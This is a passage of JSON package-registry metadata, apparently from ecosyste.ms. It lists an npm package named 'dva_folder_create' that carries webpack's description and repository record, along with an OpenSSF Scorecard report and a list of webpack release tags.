"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages_latest.webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages_latest.webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages_latest.webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages_latest.webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages_latest.webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages_latest.webpack/codemeta","maintainers":[],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":3599},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-09-02T05:03:05.616Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":1641363,"name":"dva_folder_create","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack#readme","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":8,"first_release_published_at":"2018-01-10T02:45:39.872Z","latest_release_published_at":"2018-01-10T10:17:32.776Z","latest_release_number":"0.0.9","last_synced_at":"2026-09-03T00:16:23.979Z","created_at":"2022-04-09T13:02:36.332Z","updated_at":"2026-09-03T00:16:23.979Z","registry_url":"https://www.npmjs.com/package/dva_folder_create","install_command":"npm install dva_folder_create","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.0.9"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependenc